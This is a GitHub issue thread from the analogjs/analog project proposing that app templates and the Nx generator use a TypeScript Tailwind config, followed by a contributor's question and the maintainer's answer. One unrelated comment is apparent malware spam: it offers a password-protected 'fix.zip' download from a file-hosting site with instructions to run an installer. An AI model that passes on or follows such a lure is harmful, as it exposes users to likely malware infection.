### ISSUE TITLE
Feature: Update app generators and templates to use TypeScript for Tailwind config

### ISSUE THREAD

**Issue by brandonroberts** [analogjs/analog#1297]
### Which scope/s are relevant/related to the feature request?

create-analog

### Information

Tailwind allows us to use a `tailwind.config.ts` file instead of `tailwind.config.cjs` with ESM

https://tailwindcss.com/docs/configuration#using-esm-or-type-script

This updates
- create-analog templates for `latest`, `blog`
- nx-plugin that generates a new app

### I would be willing to submit a PR to fix this issue

- [ ] Yes
- [ ] No

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by redfox-mx** [comment]
Hi @brandonroberts nice to meet you!

Maybe I can try to implemente this feature, but I have some dubts... tailwind supports `.js` and `.ts` for projects mark as `type: module` so, should default templates be created with `.ts` files or user can pass arguments to generator and set template similar to `npx tailwindcss init` command?

**Comment by brandonroberts** [comment]
Welcome @redfox-mx!

The default templates should created with `.ts` files as we only support `type: module` and TypeScript is the preferred option.
